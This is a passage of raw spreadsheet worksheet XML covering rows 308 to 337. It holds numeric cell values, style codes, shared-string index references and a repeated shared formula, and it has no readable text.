        <v>1011</v>
      </c>
      <c r="X308" s="6">
        <v>1.0</v>
      </c>
      <c r="Y308" s="6">
        <v>0.0</v>
      </c>
      <c r="Z308" s="8"/>
      <c r="AA308" s="8"/>
      <c r="AB308" s="8"/>
      <c r="AC308" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE308" s="8"/>
      <c r="AF308" s="14"/>
    </row>
    <row r="309">
      <c r="A309" s="6">
        <f t="shared" si="1"/>
        <v>0.0640973926</v>
      </c>
      <c r="B309" s="6">
        <v>2406663.0</v>
      </c>
      <c r="C309" s="6">
        <v>1.0</v>
      </c>
      <c r="D309" s="6">
        <v>2423072.0</v>
      </c>
      <c r="E309" s="8"/>
      <c r="F309" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G309" s="8"/>
      <c r="H309" s="6">
        <v>4.0</v>
      </c>
      <c r="I309" s="6">
        <v>4432.0</v>
      </c>
      <c r="J309" s="17"/>
      <c r="K309" s="17"/>
      <c r="L309" s="17"/>
      <c r="M309" s="17"/>
      <c r="N309" s="17"/>
      <c r="O309" s="4" t="s">
        <v>1012</v>
      </c>
      <c r="P309" s="4" t="s">
        <v>1013</v>
      </c>
      <c r="Q309" s="6">
        <v>192800.0</v>
      </c>
      <c r="R309" s="7"/>
      <c r="S309" s="7"/>
      <c r="T309" s="7"/>
      <c r="U309" s="8"/>
      <c r="V309" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W309" s="2" t="s">
        <v>1014</v>
      </c>
      <c r="X309" s="6">
        <v>5.0</v>
      </c>
      <c r="Y309" s="6">
        <v>0.0</v>
      </c>
      <c r="Z309" s="6">
        <v>0.0</v>
      </c>
      <c r="AA309" s="7"/>
      <c r="AB309" s="7"/>
      <c r="AC309" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE309" s="8"/>
      <c r="AF309" s="15"/>
    </row>
    <row r="310">
      <c r="A310" s="6">
        <f t="shared" si="1"/>
        <v>0.6711120748</v>
      </c>
      <c r="B310" s="6">
        <v>6.4571408E7</v>
      </c>
      <c r="C310" s="6">
        <v>1.0</v>
      </c>
      <c r="D310" s="8"/>
      <c r="E310" s="8"/>
      <c r="F310" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G310" s="8"/>
      <c r="H310" s="6">
        <v>0.0</v>
      </c>
      <c r="I310" s="6">
        <v>74.0</v>
      </c>
      <c r="J310" s="20"/>
      <c r="K310" s="20"/>
      <c r="L310" s="20"/>
      <c r="M310" s="20"/>
      <c r="N310" s="20"/>
      <c r="O310" s="4" t="s">
        <v>1015</v>
      </c>
      <c r="P310" s="4" t="s">
        <v>1016</v>
      </c>
      <c r="Q310" s="6">
        <v>1.1509906E7</v>
      </c>
      <c r="R310" s="8"/>
      <c r="S310" s="8"/>
      <c r="T310" s="8"/>
      <c r="U310" s="8"/>
      <c r="V310" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W310" s="2" t="s">
        <v>1017</v>
      </c>
      <c r="X310" s="6">
        <v>1.0</v>
      </c>
      <c r="Y310" s="6">
        <v>0.0</v>
      </c>
      <c r="Z310" s="8"/>
      <c r="AA310" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB310" s="8"/>
      <c r="AC310" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE310" s="8"/>
      <c r="AF310" s="14"/>
    </row>
    <row r="311">
      <c r="A311" s="6">
        <f t="shared" si="1"/>
        <v>0.6639372861</v>
      </c>
      <c r="B311" s="6">
        <v>6.9237105E7</v>
      </c>
      <c r="C311" s="6">
        <v>1.0</v>
      </c>
      <c r="D311" s="8"/>
      <c r="E311" s="8"/>
      <c r="F311" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G311" s="8"/>
      <c r="H311" s="6">
        <v>1.0</v>
      </c>
      <c r="I311" s="6">
        <v>18.0</v>
      </c>
      <c r="J311" s="17"/>
      <c r="K311" s="17"/>
      <c r="L311" s="17"/>
      <c r="M311" s="17"/>
      <c r="N311" s="17"/>
      <c r="O311" s="4" t="s">
        <v>1018</v>
      </c>
      <c r="P311" s="4" t="s">
        <v>1019</v>
      </c>
      <c r="Q311" s="6">
        <v>1.6945831E7</v>
      </c>
      <c r="R311" s="7"/>
      <c r="S311" s="7"/>
      <c r="T311" s="7"/>
      <c r="U311" s="8"/>
      <c r="V311" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W311" s="2" t="s">
        <v>1020</v>
      </c>
      <c r="X311" s="6">
        <v>0.0</v>
      </c>
      <c r="Y311" s="6">
        <v>2.0</v>
      </c>
      <c r="Z311" s="7"/>
      <c r="AA311" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB311" s="7"/>
      <c r="AC311" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE311" s="8"/>
      <c r="AF311" s="15"/>
    </row>
    <row r="312">
      <c r="A312" s="6">
        <f t="shared" si="1"/>
        <v>0.5709033597</v>
      </c>
      <c r="B312" s="6">
        <v>7.5938656E7</v>
      </c>
      <c r="C312" s="6">
        <v>1.0</v>
      </c>
      <c r="D312" s="6">
        <v>7.5992779E7</v>
      </c>
      <c r="E312" s="8"/>
      <c r="F312" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G312" s="8"/>
      <c r="H312" s="6">
        <v>-3.0</v>
      </c>
      <c r="I312" s="6">
        <v>47.0</v>
      </c>
      <c r="J312" s="20"/>
      <c r="K312" s="20"/>
      <c r="L312" s="20"/>
      <c r="M312" s="20"/>
      <c r="N312" s="20"/>
      <c r="O312" s="4" t="s">
        <v>1021</v>
      </c>
      <c r="P312" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="Q312" s="6">
        <v>1.5053625E7</v>
      </c>
      <c r="R312" s="8"/>
      <c r="S312" s="6">
        <v>874188.0</v>
      </c>
      <c r="T312" s="8"/>
      <c r="U312" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V312" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W312" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="X312" s="6">
        <v>2.0</v>
      </c>
      <c r="Y312" s="6">
        <v>0.0</v>
      </c>
      <c r="Z312" s="8"/>
      <c r="AA312" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB312" s="8"/>
      <c r="AC312" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE312" s="8"/>
      <c r="AF312" s="14"/>
    </row>
    <row r="313">
      <c r="A313" s="6">
        <f t="shared" si="1"/>
        <v>0.7146284913</v>
      </c>
      <c r="B313" s="6">
        <v>318677.0</v>
      </c>
      <c r="C313" s="6">
        <v>1.0</v>
      </c>
      <c r="D313" s="7"/>
      <c r="E313" s="8"/>
      <c r="F313" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G313" s="8"/>
      <c r="H313" s="6">
        <v>18.0</v>
      </c>
      <c r="I313" s="6">
        <v>4037.0</v>
      </c>
      <c r="J313" s="17"/>
      <c r="K313" s="17"/>
      <c r="L313" s="17"/>
      <c r="M313" s="17"/>
      <c r="N313" s="17"/>
      <c r="O313" s="4" t="s">
        <v>1024</v>
      </c>
      <c r="P313" s="4" t="s">
        <v>1025</v>
      </c>
      <c r="Q313" s="7"/>
      <c r="R313" s="2" t="s">
        <v>1026</v>
      </c>
      <c r="T313" s="2" t="s">
        <v>1026</v>
      </c>
      <c r="U313" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V313" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W313" s="2" t="s">
        <v>1027</v>
      </c>
      <c r="X313" s="6">
        <v>6.0</v>
      </c>
      <c r="Y313" s="6">
        <v>8.0</v>
      </c>
      <c r="Z313" s="6">
        <v>0.0</v>
      </c>
      <c r="AA313" s="7"/>
      <c r="AB313" s="7"/>
      <c r="AC313" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE313" s="8"/>
      <c r="AF313" s="15"/>
    </row>
    <row r="314">
      <c r="A314" s="6">
        <f t="shared" si="1"/>
        <v>0.1757603989</v>
      </c>
      <c r="B314" s="6">
        <v>1.9591801E7</v>
      </c>
      <c r="C314" s="6">
        <v>1.0</v>
      </c>
      <c r="D314" s="7"/>
      <c r="E314" s="8"/>
      <c r="F314" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G314" s="8"/>
      <c r="H314" s="6">
        <v>1.0</v>
      </c>
      <c r="I314" s="6">
        <v>2155.0</v>
      </c>
      <c r="J314" s="17"/>
      <c r="K314" s="17"/>
      <c r="L314" s="17"/>
      <c r="M314" s="17"/>
      <c r="N314" s="17"/>
      <c r="O314" s="4" t="s">
        <v>1028</v>
      </c>
      <c r="P314" s="4" t="s">
        <v>1029</v>
      </c>
      <c r="Q314" s="6">
        <v>879947.0</v>
      </c>
      <c r="R314" s="7"/>
      <c r="S314" s="6">
        <v>879947.0</v>
      </c>
      <c r="T314" s="7"/>
      <c r="U314" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V314" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W314" s="2" t="s">
        <v>1030</v>
      </c>
      <c r="X314" s="6">
        <v>1.0</v>
      </c>
      <c r="Y314" s="6">
        <v>7.0</v>
      </c>
      <c r="Z314" s="7"/>
      <c r="AA314" s="7"/>
      <c r="AB314" s="7"/>
      <c r="AC314" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE314" s="8"/>
      <c r="AF314" s="15"/>
    </row>
    <row r="315">
      <c r="A315" s="6">
        <f t="shared" si="1"/>
        <v>0.3562144469</v>
      </c>
      <c r="B315" s="6">
        <v>4.1658641E7</v>
      </c>
      <c r="C315" s="6">
        <v>1.0</v>
      </c>
      <c r="D315" s="6">
        <v>4.1660413E7</v>
      </c>
      <c r="E315" s="8"/>
      <c r="F315" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G315" s="8"/>
      <c r="H315" s="6">
        <v>3.0</v>
      </c>
      <c r="I315" s="6">
        <v>14574.0</v>
      </c>
      <c r="J315" s="17"/>
      <c r="K315" s="17"/>
      <c r="L315" s="17"/>
      <c r="M315" s="17"/>
      <c r="N315" s="17"/>
      <c r="O315" s="4" t="s">
        <v>1031</v>
      </c>
      <c r="P315" s="4" t="s">
        <v>1032</v>
      </c>
      <c r="Q315" s="6">
        <v>6583914.0</v>
      </c>
      <c r="R315" s="7"/>
      <c r="S315" s="6">
        <v>6583914.0</v>
      </c>
      <c r="T315" s="7"/>
      <c r="U315" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V315" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W315" s="2" t="s">
        <v>1033</v>
      </c>
      <c r="X315" s="6">
        <v>1.0</v>
      </c>
      <c r="Y315" s="6">
        <v>0.0</v>
      </c>
      <c r="Z315" s="7"/>
      <c r="AA315" s="7"/>
      <c r="AB315" s="7"/>
      <c r="AC315" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE315" s="8"/>
      <c r="AF315" s="15"/>
    </row>
    <row r="316">
      <c r="A316" s="6">
        <f t="shared" si="1"/>
        <v>0.546769476</v>
      </c>
      <c r="B316" s="6">
        <v>1.8123866E7</v>
      </c>
      <c r="C316" s="6">
        <v>1.0</v>
      </c>
      <c r="D316" s="6">
        <v>1.8130915E7</v>
      </c>
      <c r="E316" s="8"/>
      <c r="F316" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G316" s="8"/>
      <c r="H316" s="6">
        <v>5.0</v>
      </c>
      <c r="I316" s="6">
        <v>7275.0</v>
      </c>
      <c r="J316" s="17"/>
      <c r="K316" s="17"/>
      <c r="L316" s="17"/>
      <c r="M316" s="17"/>
      <c r="N316" s="17"/>
      <c r="O316" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="P316" s="4" t="s">
        <v>1035</v>
      </c>
      <c r="Q316" s="6">
        <v>356815.0</v>
      </c>
      <c r="R316" s="7"/>
      <c r="S316" s="6">
        <v>1437016.0</v>
      </c>
      <c r="T316" s="7"/>
      <c r="U316" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V316" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W316" s="2" t="s">
        <v>1036</v>
      </c>
      <c r="X316" s="6">
        <v>2.0</v>
      </c>
      <c r="Y316" s="6">
        <v>2.0</v>
      </c>
      <c r="Z316" s="6">
        <v>0.0</v>
      </c>
      <c r="AA316" s="7"/>
      <c r="AB316" s="7"/>
      <c r="AC316" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE316" s="8"/>
      <c r="AF316" s="15"/>
    </row>
    <row r="317">
      <c r="A317" s="6">
        <f t="shared" si="1"/>
        <v>0.1048113121</v>
      </c>
      <c r="B317" s="6">
        <v>2.5884722E7</v>
      </c>
      <c r="C317" s="6">
        <v>1.0</v>
      </c>
      <c r="D317" s="8"/>
      <c r="E317" s="8"/>
      <c r="F317" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G317" s="8"/>
      <c r="H317" s="6">
        <v>3.0</v>
      </c>
      <c r="I317" s="6">
        <v>3212.0</v>
      </c>
      <c r="J317" s="20"/>
      <c r="K317" s="20"/>
      <c r="L317" s="20"/>
      <c r="M317" s="20"/>
      <c r="N317" s="20"/>
      <c r="O317" s="4" t="s">
        <v>1037</v>
      </c>
      <c r="P317" s="4" t="s">
        <v>1038</v>
      </c>
      <c r="Q317" s="6">
        <v>4047971.0</v>
      </c>
      <c r="R317" s="8"/>
      <c r="S317" s="6">
        <v>333340.0</v>
      </c>
      <c r="T317" s="8"/>
      <c r="U317" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V317" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W317" s="2" t="s">
        <v>1039</v>
      </c>
      <c r="X317" s="6">
        <v>3.0</v>
      </c>
      <c r="Y317" s="6">
        <v>1.0</v>
      </c>
      <c r="Z317" s="6">
        <v>0.0</v>
      </c>
      <c r="AA317" s="8"/>
      <c r="AB317" s="8"/>
      <c r="AC317" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE317" s="8"/>
      <c r="AF317" s="14"/>
    </row>
    <row r="318">
      <c r="A318" s="6">
        <f t="shared" si="1"/>
        <v>0.1696170988</v>
      </c>
      <c r="B318" s="6">
        <v>6193983.0</v>
      </c>
      <c r="C318" s="6">
        <v>1.0</v>
      </c>
      <c r="D318" s="6">
        <v>6207845.0</v>
      </c>
      <c r="E318" s="8"/>
      <c r="F318" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G318" s="8"/>
      <c r="H318" s="6">
        <v>12.0</v>
      </c>
      <c r="I318" s="6">
        <v>8129.0</v>
      </c>
      <c r="J318" s="20"/>
      <c r="K318" s="20"/>
      <c r="L318" s="20"/>
      <c r="M318" s="20"/>
      <c r="N318" s="20"/>
      <c r="O318" s="4" t="s">
        <v>1040</v>
      </c>
      <c r="P318" s="4" t="s">
        <v>1041</v>
      </c>
      <c r="Q318" s="6">
        <v>143295.0</v>
      </c>
      <c r="R318" s="8"/>
      <c r="S318" s="8"/>
      <c r="T318" s="8"/>
      <c r="U318" s="8"/>
      <c r="V318" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W318" s="2" t="s">
        <v>1042</v>
      </c>
      <c r="X318" s="6">
        <v>2.0</v>
      </c>
      <c r="Y318" s="6">
        <v>0.0</v>
      </c>
      <c r="Z318" s="6">
        <v>0.0</v>
      </c>
      <c r="AA318" s="8"/>
      <c r="AB318" s="8"/>
      <c r="AC318" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE318" s="8"/>
      <c r="AF318" s="14"/>
    </row>
    <row r="319">
      <c r="A319" s="6">
        <f t="shared" si="1"/>
        <v>0.5072464489</v>
      </c>
      <c r="B319" s="6">
        <v>7.529583E7</v>
      </c>
      <c r="C319" s="6">
        <v>1.0</v>
      </c>
      <c r="D319" s="8"/>
      <c r="E319" s="8"/>
      <c r="F319" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G319" s="8"/>
      <c r="H319" s="6">
        <v>0.0</v>
      </c>
      <c r="I319" s="6">
        <v>181.0</v>
      </c>
      <c r="J319" s="20"/>
      <c r="K319" s="20"/>
      <c r="L319" s="20"/>
      <c r="M319" s="20"/>
      <c r="N319" s="20"/>
      <c r="O319" s="4" t="s">
        <v>1043</v>
      </c>
      <c r="P319" s="4" t="s">
        <v>1044</v>
      </c>
      <c r="Q319" s="6">
        <v>1.8595897E7</v>
      </c>
      <c r="R319" s="8"/>
      <c r="S319" s="8"/>
      <c r="T319" s="8"/>
      <c r="U319" s="8"/>
      <c r="V319" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W319" s="2" t="s">
        <v>1045</v>
      </c>
      <c r="X319" s="6">
        <v>2.0</v>
      </c>
      <c r="Y319" s="6">
        <v>1.0</v>
      </c>
      <c r="Z319" s="8"/>
      <c r="AA319" s="8"/>
      <c r="AB319" s="8"/>
      <c r="AC319" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE319" s="8"/>
      <c r="AF319" s="14"/>
    </row>
    <row r="320">
      <c r="A320" s="6">
        <f t="shared" si="1"/>
        <v>0.7749980507</v>
      </c>
      <c r="B320" s="6">
        <v>5.3500997E7</v>
      </c>
      <c r="C320" s="6">
        <v>1.0</v>
      </c>
      <c r="D320" s="8"/>
      <c r="E320" s="8"/>
      <c r="F320" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G320" s="8"/>
      <c r="H320" s="6">
        <v>4.0</v>
      </c>
      <c r="I320" s="6">
        <v>1362.0</v>
      </c>
      <c r="J320" s="20"/>
      <c r="K320" s="20"/>
      <c r="L320" s="20"/>
      <c r="M320" s="20"/>
      <c r="N320" s="20"/>
      <c r="O320" s="4" t="s">
        <v>1046</v>
      </c>
      <c r="P320" s="4" t="s">
        <v>1047</v>
      </c>
      <c r="Q320" s="6">
        <v>42446.0</v>
      </c>
      <c r="R320" s="8"/>
      <c r="S320" s="8"/>
      <c r="T320" s="8"/>
      <c r="U320" s="8"/>
      <c r="V320" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W320" s="2" t="s">
        <v>1048</v>
      </c>
      <c r="X320" s="6">
        <v>0.0</v>
      </c>
      <c r="Y320" s="6">
        <v>0.0</v>
      </c>
      <c r="Z320" s="8"/>
      <c r="AA320" s="8"/>
      <c r="AB320" s="8"/>
      <c r="AC320" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE320" s="8"/>
      <c r="AF320" s="14"/>
    </row>
    <row r="321">
      <c r="A321" s="6">
        <f t="shared" si="1"/>
        <v>0.4718633789</v>
      </c>
      <c r="B321" s="6">
        <v>4.3078583E7</v>
      </c>
      <c r="C321" s="6">
        <v>1.0</v>
      </c>
      <c r="D321" s="8"/>
      <c r="E321" s="8"/>
      <c r="F321" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G321" s="8"/>
      <c r="H321" s="6">
        <v>2.0</v>
      </c>
      <c r="I321" s="6">
        <v>508.0</v>
      </c>
      <c r="J321" s="20"/>
      <c r="K321" s="20"/>
      <c r="L321" s="20"/>
      <c r="M321" s="20"/>
      <c r="N321" s="20"/>
      <c r="O321" s="4" t="s">
        <v>1049</v>
      </c>
      <c r="P321" s="4" t="s">
        <v>1050</v>
      </c>
      <c r="Q321" s="6">
        <v>7518551.0</v>
      </c>
      <c r="R321" s="8"/>
      <c r="S321" s="6">
        <v>-1.0</v>
      </c>
      <c r="T321" s="8"/>
      <c r="U321" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V321" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W321" s="2" t="s">
        <v>1051</v>
      </c>
      <c r="X321" s="6">
        <v>1.0</v>
      </c>
      <c r="Y321" s="6">
        <v>0.0</v>
      </c>
      <c r="Z321" s="8"/>
      <c r="AA321" s="8"/>
      <c r="AB321" s="8"/>
      <c r="AC321" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE321" s="8"/>
      <c r="AF321" s="14"/>
    </row>
    <row r="322">
      <c r="A322" s="6">
        <f t="shared" si="1"/>
        <v>0.9869451083</v>
      </c>
      <c r="B322" s="6">
        <v>4.6831111E7</v>
      </c>
      <c r="C322" s="6">
        <v>1.0</v>
      </c>
      <c r="D322" s="7"/>
      <c r="E322" s="8"/>
      <c r="F322" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G322" s="8"/>
      <c r="H322" s="6">
        <v>0.0</v>
      </c>
      <c r="I322" s="6">
        <v>26.0</v>
      </c>
      <c r="J322" s="17"/>
      <c r="K322" s="17"/>
      <c r="L322" s="17"/>
      <c r="M322" s="17"/>
      <c r="N322" s="17"/>
      <c r="O322" s="4" t="s">
        <v>1052</v>
      </c>
      <c r="P322" s="4" t="s">
        <v>1053</v>
      </c>
      <c r="Q322" s="6">
        <v>8602118.0</v>
      </c>
      <c r="R322" s="7"/>
      <c r="S322" s="7"/>
      <c r="T322" s="7"/>
      <c r="U322" s="8"/>
      <c r="V322" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W322" s="2" t="s">
        <v>603</v>
      </c>
      <c r="X322" s="6">
        <v>0.0</v>
      </c>
      <c r="Y322" s="6">
        <v>2.0</v>
      </c>
      <c r="Z322" s="7"/>
      <c r="AA322" s="7"/>
      <c r="AB322" s="7"/>
      <c r="AC322" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE322" s="8"/>
      <c r="AF322" s="15"/>
    </row>
    <row r="323">
      <c r="A323" s="6">
        <f t="shared" si="1"/>
        <v>0.6042579762</v>
      </c>
      <c r="B323" s="6">
        <v>3.9973555E7</v>
      </c>
      <c r="C323" s="6">
        <v>1.0</v>
      </c>
      <c r="D323" s="8"/>
      <c r="E323" s="8"/>
      <c r="F323" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G323" s="8"/>
      <c r="H323" s="6">
        <v>0.0</v>
      </c>
      <c r="I323" s="6">
        <v>185.0</v>
      </c>
      <c r="J323" s="17"/>
      <c r="K323" s="17"/>
      <c r="L323" s="17"/>
      <c r="M323" s="17"/>
      <c r="N323" s="17"/>
      <c r="O323" s="4" t="s">
        <v>1054</v>
      </c>
      <c r="P323" s="4" t="s">
        <v>1055</v>
      </c>
      <c r="Q323" s="6">
        <v>1673376.0</v>
      </c>
      <c r="R323" s="7"/>
      <c r="S323" s="7"/>
      <c r="T323" s="7"/>
      <c r="U323" s="8"/>
      <c r="V323" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W323" s="2" t="s">
        <v>1056</v>
      </c>
      <c r="X323" s="6">
        <v>0.0</v>
      </c>
      <c r="Y323" s="6">
        <v>2.0</v>
      </c>
      <c r="Z323" s="6">
        <v>0.0</v>
      </c>
      <c r="AA323" s="7"/>
      <c r="AB323" s="7"/>
      <c r="AC323" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE323" s="8"/>
      <c r="AF323" s="15"/>
    </row>
    <row r="324">
      <c r="A324" s="6">
        <f t="shared" si="1"/>
        <v>0.4556739352</v>
      </c>
      <c r="B324" s="6">
        <v>5.7538129E7</v>
      </c>
      <c r="C324" s="6">
        <v>1.0</v>
      </c>
      <c r="D324" s="7"/>
      <c r="E324" s="8"/>
      <c r="F324" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G324" s="8"/>
      <c r="H324" s="6">
        <v>0.0</v>
      </c>
      <c r="I324" s="6">
        <v>119.0</v>
      </c>
      <c r="J324" s="17"/>
      <c r="K324" s="17"/>
      <c r="L324" s="17"/>
      <c r="M324" s="17"/>
      <c r="N324" s="17"/>
      <c r="O324" s="4" t="s">
        <v>1057</v>
      </c>
      <c r="P324" s="4" t="s">
        <v>1058</v>
      </c>
      <c r="Q324" s="6">
        <v>1.193681E7</v>
      </c>
      <c r="R324" s="7"/>
      <c r="S324" s="7"/>
      <c r="T324" s="7"/>
      <c r="U324" s="8"/>
      <c r="V324" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W324" s="2" t="s">
        <v>404</v>
      </c>
      <c r="X324" s="6">
        <v>1.0</v>
      </c>
      <c r="Y324" s="6">
        <v>1.0</v>
      </c>
      <c r="Z324" s="7"/>
      <c r="AA324" s="7"/>
      <c r="AB324" s="7"/>
      <c r="AC324" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE324" s="8"/>
      <c r="AF324" s="15"/>
    </row>
    <row r="325">
      <c r="A325" s="6">
        <f t="shared" si="1"/>
        <v>0.8697855888</v>
      </c>
      <c r="B325" s="6">
        <v>7.6611915E7</v>
      </c>
      <c r="C325" s="6">
        <v>1.0</v>
      </c>
      <c r="D325" s="7"/>
      <c r="E325" s="8"/>
      <c r="F325" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G325" s="8"/>
      <c r="H325" s="6">
        <v>-1.0</v>
      </c>
      <c r="I325" s="6">
        <v>13.0</v>
      </c>
      <c r="J325" s="17"/>
      <c r="K325" s="17"/>
      <c r="L325" s="17"/>
      <c r="M325" s="17"/>
      <c r="N325" s="17"/>
      <c r="O325" s="4" t="s">
        <v>1059</v>
      </c>
      <c r="P325" s="4" t="s">
        <v>1060</v>
      </c>
      <c r="Q325" s="6">
        <v>543732.0</v>
      </c>
      <c r="R325" s="7"/>
      <c r="S325" s="7"/>
      <c r="T325" s="7"/>
      <c r="U325" s="8"/>
      <c r="V325" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W325" s="2" t="s">
        <v>1061</v>
      </c>
      <c r="X325" s="6">
        <v>0.0</v>
      </c>
      <c r="Y325" s="6">
        <v>1.0</v>
      </c>
      <c r="Z325" s="7"/>
      <c r="AA325" s="7"/>
      <c r="AB325" s="7"/>
      <c r="AC325" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE325" s="8"/>
      <c r="AF325" s="15"/>
    </row>
    <row r="326">
      <c r="A326" s="6">
        <f t="shared" si="1"/>
        <v>0.6799414261</v>
      </c>
      <c r="B326" s="6">
        <v>2.935095E7</v>
      </c>
      <c r="C326" s="6">
        <v>1.0</v>
      </c>
      <c r="D326" s="8"/>
      <c r="E326" s="8"/>
      <c r="F326" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G326" s="8"/>
      <c r="H326" s="6">
        <v>4.0</v>
      </c>
      <c r="I326" s="6">
        <v>1264.0</v>
      </c>
      <c r="J326" s="20"/>
      <c r="K326" s="20"/>
      <c r="L326" s="20"/>
      <c r="M326" s="20"/>
      <c r="N326" s="20"/>
      <c r="O326" s="4" t="s">
        <v>1062</v>
      </c>
      <c r="P326" s="4" t="s">
        <v>1063</v>
      </c>
      <c r="Q326" s="6">
        <v>4730460.0</v>
      </c>
      <c r="R326" s="8"/>
      <c r="S326" s="6">
        <v>4730460.0</v>
      </c>
      <c r="T326" s="8"/>
      <c r="U326" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V326" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W326" s="2" t="s">
        <v>1064</v>
      </c>
      <c r="X326" s="6">
        <v>1.0</v>
      </c>
      <c r="Y326" s="6">
        <v>0.0</v>
      </c>
      <c r="Z326" s="6">
        <v>0.0</v>
      </c>
      <c r="AA326" s="8"/>
      <c r="AB326" s="8"/>
      <c r="AC326" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE326" s="8"/>
      <c r="AF326" s="14"/>
    </row>
    <row r="327">
      <c r="A327" s="29"/>
      <c r="J327" s="30"/>
      <c r="K327" s="30"/>
      <c r="L327" s="30"/>
      <c r="M327" s="30"/>
      <c r="N327" s="30"/>
      <c r="O327" s="31"/>
      <c r="P327" s="31"/>
    </row>
    <row r="328">
      <c r="A328" s="29"/>
      <c r="J328" s="30"/>
      <c r="K328" s="30"/>
      <c r="L328" s="30"/>
      <c r="M328" s="30"/>
      <c r="N328" s="30"/>
      <c r="O328" s="31"/>
      <c r="P328" s="31"/>
    </row>
    <row r="329">
      <c r="A329" s="29"/>
      <c r="J329" s="30"/>
      <c r="K329" s="30"/>
      <c r="L329" s="30"/>
      <c r="M329" s="30"/>
      <c r="N329" s="30"/>
      <c r="O329" s="31"/>
      <c r="P329" s="31"/>
    </row>
    <row r="330">
      <c r="A330" s="29"/>
      <c r="J330" s="30"/>
      <c r="K330" s="30"/>
      <c r="L330" s="30"/>
      <c r="M330" s="30"/>
      <c r="N330" s="30"/>
      <c r="O330" s="31"/>
      <c r="P330" s="31"/>
    </row>
    <row r="331">
      <c r="A331" s="29"/>
      <c r="J331" s="30"/>
      <c r="K331" s="30"/>
      <c r="L331" s="30"/>
      <c r="M331" s="30"/>
      <c r="N331" s="30"/>
      <c r="O331" s="31"/>
      <c r="P331" s="31"/>
    </row>
    <row r="332">
      <c r="J332" s="30"/>
      <c r="K332" s="30"/>
      <c r="L332" s="30"/>
      <c r="M332" s="30"/>
      <c r="N332" s="30"/>
      <c r="O332" s="31"/>
      <c r="P332" s="31"/>
    </row>
    <row r="333">
      <c r="J333" s="30"/>
      <c r="K333" s="30"/>
      <c r="L333" s="30"/>
      <c r="M333" s="30"/>
      <c r="N333" s="30"/>
      <c r="O333" s="31"/>
      <c r="P333" s="31"/>
    </row>
    <row r="334">
      <c r="J334" s="30"/>
      <c r="K334" s="30"/>
      <c r="L334" s="30"/>
      <c r="M334" s="30"/>
      <c r="N334" s="30"/>
      <c r="O334" s="31"/>
      <c r="P334" s="31"/>
    </row>
    <row r="335">
      <c r="J335" s="30"/>
      <c r="K335" s="30"/>
      <c r="L335" s="30"/>
      <c r="M335" s="30"/>
      <c r="N335" s="30"/>
      <c r="O335" s="31"/>
      <c r="P335" s="31"/>
    </row>
    <row r="336">
      <c r="J336" s="30"/>
      <c r="K336" s="30"/>
      <c r="L336" s="30"/>
      <c r="M336" s="30"/>
      <c r="N336" s="30"/>
      <c r="O336" s="31"/>
      <c r="P336" s="31"/>
    </row>
    <row r="337">
      <c r="J337" s="30"/>
      <c r="K337" s="30"/>
      <c r="L337" s="30"/>
      <c r="M337" s="30"/>
      <c r="N337" s="30"/>
      <c r="O337" s="31"/>
